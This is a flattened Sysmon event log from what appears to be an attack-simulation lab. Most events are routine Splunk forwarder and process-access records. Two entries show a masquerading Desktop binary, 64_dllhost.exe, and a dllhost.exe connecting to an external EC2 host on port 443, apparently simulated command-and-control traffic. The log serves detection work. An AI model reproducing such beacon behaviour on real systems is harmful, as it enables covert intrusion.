19:17:59.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095022Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.907{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA1952174E8AFA70BCF0EECC573E9AA,SHA256=DB1EEFACF6D9558624D19F55C4A7542908D440D3525FD4B1D79D3F8FAA338840,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001606044Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.804{21761711-C665-607D-D60D-00000000BB01}4492WIN-HOST-5\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\datareporting\aborted-session-pingMD5=F80F87145358A8F5A36FF7257D831AE4,SHA256=548CEE8C250677A72E347DC07726167903180AB3596DBB031BD809F78EC42861falsefalse - insufficient disk space 11241100x80000000000000001606043Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.804{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\datareporting\aborted-session-ping.tmp2021-04-21 19:18:00.804 11241100x80000000000000001606042Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.220{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606041Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.220{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEF094076F5A5DD5F2047CB984FA273B,SHA256=30CA25C8937A887CC7C4B86DAA6FEDF91B5205ECEA0379BB36BCFDC2AEFDD871falsefalse - insufficient disk space 11241100x80000000000000001606040Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.219{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 
13:20:22.616 23542300x80000000000000001606039Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.219{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC19776DBBFBEFBB7462F264E840555F,SHA256=4C6E1C0BE8DE741E501D674008AE53269F107398233C10BA7FF9C09FAD7D82BFfalsefalse - insufficient disk space 10341000x80000000000000001095021Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095020Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001095025Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:01.912{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12828E4ABA6EFEA8342954ECB8FC3284,SHA256=E795041B1A5D89EFA8022991AF3FD448ADD2576791353AC71184B884A3B52685,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606047Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:58.766{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49726-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606046Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:01.042{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606045Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:01.042{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F22FF4A0A1DE3E81918E6A78A815E73,SHA256=B485D14D3DE5297FEF883502C7F5BCCB4DB45E76EDF4D7C13027D4E3A9995FAEfalsefalse - insufficient disk space 10341000x80000000000000001095024Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:01.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095023Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:01.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095030Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.915{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6494554F9E28116467DBCD299A523B5A,SHA256=F298E278D3BD0B9CD91440433693FA3D224CE2978BE513272CB1766518DD1986,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:02.076{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606048Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:02.076{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA35821A6FC16F2E4089896E1A0F868,SHA256=281F4D04801D7EAB06A273B2C1D4E4CD8BC48DA373CC42FACE0744BD163ECB27falsefalse - insufficient disk space 10341000x80000000000000001095029Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095028Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:02.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095027Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.473{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=558C0D3C144F7FC9DFE6CA4DD7D5D975,SHA256=36B03D4676A4DE5FFA81F094768671C4926A5604B120679A6D5E38E7BE4A19FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095026Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.472{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=991BBADCB91968A3B3C85363605EC044,SHA256=213BAC42A49CC6E7324FE50CA83DFB9D037A0B44A3BB67960D5822CA75568424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095035Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:03.938{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C85B1A256B5FA2ED5FCAF50C323C977,SHA256=E6D269024AD55B9A540EB1F2F21BB80768CF342059B9E5E336A0A49157440AB6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:03.078{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:03.078{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03396CF7C1AB604C38DD32918EDDD8C6,SHA256=88A69F04AEEE71C8F1041E5576D28CBF3BC84DA155C04F23148A0DCC9B6BFCF3falsefalse - insufficient disk space 354300x80000000000000001095034Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.626{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1143-false10.0.1.12-8000- 354300x80000000000000001095033Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.046{761B69BB-660F-6080-305D-00000000BA01}384C:\Windows\System32\dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1142-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095032Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:03.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095031Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:03.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095039Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.941{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0F57F6A4F8A0EB0315214AECDEAB801,SHA256=54A267DFD1589E101F198AA89490A508CF9E48552E36ECA664F067CBDD53EF33,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:04.265{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:04.265{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99F2197F8437E06A9C79EBD4BF49FB55,SHA256=56099CE26A56BC47B31830C631A95A77CDC47391B53C0BBF6BD1E66425C9A408falsefalse - insufficient disk space 23542300x80000000000000001095038Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.732{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=558C0D3C144F7FC9DFE6CA4DD7D5D975,SHA256=36B03D4676A4DE5FFA81F094768671C4926A5604B120679A6D5E38E7BE4A19FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095037Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001095036Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095043Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:05.952{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0A2DAE94DA8AB64CB9D595A96CC54E,SHA256=47A1D3BE81C94B744A0C73AD80EB281A5D162D33B530461EA556D0BD0A4DDE6C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:05.500{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:05.500{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75AE2CD67ECE89491742D1D3C2441695,SHA256=5F2A3BFE41A137DD3291C98E8CA2BE0F08D33FF1B13250545DD57A042A0F2754falsefalse - insufficient disk space 354300x80000000000000001095042Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.330{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1144-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095041Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:05.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095040Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:05.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095046Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:06.961{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD6F22CCB529082AE91C0C2D6DBC79C,SHA256=7CC859DDE812CDB67348631C4DC2485DA99AAD1D9342BC86C10826CDE9386695,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606062Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:04.602{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49727-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.502{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:06.502{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC51D6AC38446277EE07CA73093CC230,SHA256=742DE59BE9F491F9BB56DDB836C89160305A52553E92494E4CA9D15102D3088Bfalsefalse - insufficient disk space 10341000x80000000000000001095045Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:06.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095044Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:06.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
